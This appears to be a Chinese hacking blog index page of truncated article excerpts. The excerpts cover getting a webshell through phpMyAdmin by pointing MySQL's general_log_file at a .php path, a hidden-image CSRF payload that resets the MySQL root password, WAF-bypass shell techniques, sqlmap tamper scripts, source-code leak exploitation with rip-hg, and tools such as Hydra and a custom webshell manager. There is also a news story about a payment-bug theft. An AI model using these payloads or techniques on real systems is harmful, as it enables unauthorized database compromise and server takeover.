三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]

继续阅读

修改root密码：

保存为：webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为：www.webshell.cc

写文件

首先你要知道路径

保存为：webshell.html
[......]

继续阅读

以Windows 2003为例，启动Windows 2003组策略

点“开始”，在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键，此时可以看到一个“不要运行指定的Windows应用程序”选项，双击该选项，在“策略”选项卡中选择“启用”选项，启动Windows 2003禁止运行指定应用程序的功能，单击“不允许的应用程序的列表”中的“显示”按钮，打开列表框，在列表框中单击“添加”，打开“添加项目”窗口，然后在该窗口中输入需要禁止运行的程序名（可以不输入路径），比方说要禁用注册表编辑器，则输入 sethc.exe ，接着点击“确定”，即可禁止该应用程序的运行[......]

继续阅读

Burp已经成了绿帽子门必不可少的工具，相信大家都装有Java环境，本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀，然后可惜代码是个渣渣一直可望而不可即，后续随着公司业务增多，大多数目标都有WAF，于是就想写一款完全脱离工具，只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月，除了打飞机的时间基本就在写这货了，这里要感谢@MelodyZX  牛，在我完成大体框架后，帮了我不少大忙，包括完成虚拟终端，非常感谢。 程序采用java语言编写，数据库采用了sqlite，本来想使用access，但是在jdk1.8以后移除了该功[......]

继续阅读

21岁的男子胡某在购买优酷会员礼包时发现，在自己账户余额不足时，支付宝平台会向其账户退款。于是从2015年9月起，胡某利用自己偶然发现的这一系统漏洞，半年里窃取优酷网所属的合一信息技术(北京)有限公司(下称合一公司)10余万笔资金，共计1300余万元。

如此巨款，胡某除了自己消费挥霍外，还拿出其中的400多万打赏了网络直播网站的女主播，其中最多的一次，“赏”了女主播5万元。今天上午，市一中院开庭审理了胡某涉嫌盗窃罪一案，胡某承认了检方的指控。

意外发现系统漏洞

今天上午，黑框眼镜、身材矮小的胡某被法警带入法庭。“我在公安机关的供述都属实，检察机关对我的指控也都属实。”胡某的回[......]

继续阅读

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cy[......]

继续阅读

旁白：在一个有WAF、并且mysql中的Into outfile禁用的情况下，我该如何getshell？
首先环境如下：

• OS:Windows 2003
• WAF:Safe Dog 4.0正式版
• phpmyadmin:4.7（许多都可以）
• Mysql:5.5+
• PHP:5.3
• Apache:2.x

目前

into outfile

已经被禁用，并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。

（必须是mysql root权限）

登录phpmyadmin后，查看全局变量：
找到

general[......]

继续阅读

0x00 背景

sqlmap中的tamper脚本来对目标进行更高效的攻击。

由于乌云知识库少了sqlmap-tamper 收集一下，方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我，着能偷偷说一下多做一些收集对吸收知识很快。

0x01 start

脚本名：apostrophemask.py

作用：用utf8代替引号

Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

Tested[......]

继续阅读

背景

本文主要是记录一下常见的源码泄漏问题，这些经常在web渗透测试以及CTF中出现。

.hg源码泄漏

漏洞成因：

hg init的时候会生成.hg

e.g.http://www.example.com/.hg/

漏洞利用：

工具： dvcs-ripper

rip-hg.pl -v -u http://www.example.com/.hg/

.git源码泄漏

漏洞成因：

在运行git init初始化代码库的时候，会在当前目录下面产生一个.git的隐藏文件，用来记录代码的变更记录等等。在发布代码的时候，把.git这个目录没有删除，直接发布了[......]

继续阅读

更新内容如下：

1、降级.NET版本至4.0，因之前有人反馈WIN2003无法使用，因为2003不能安装.NET4.5，现在win2003及XP都可以正常使用。

2、增加获取web服务器信息的功能，如果在渗透过程中，担心软件自动访问web服务器会记录到web日志，可以关闭获取WEB服务器信息功能，但是如果干特别大的坏事，人家还是可以通过运营商的渠道来抓你。

3、增加线程控制，因有不少人反馈，开全速的时候，他们的小电脑会卡死，反正我电脑跑起来妥妥的，所以默认设置为全速。

4、增加右键复制所选项，胖子硬提出的需求。

5、修复了一个线程锁的问题，没修复前会引起程序崩溃。[......]

继续阅读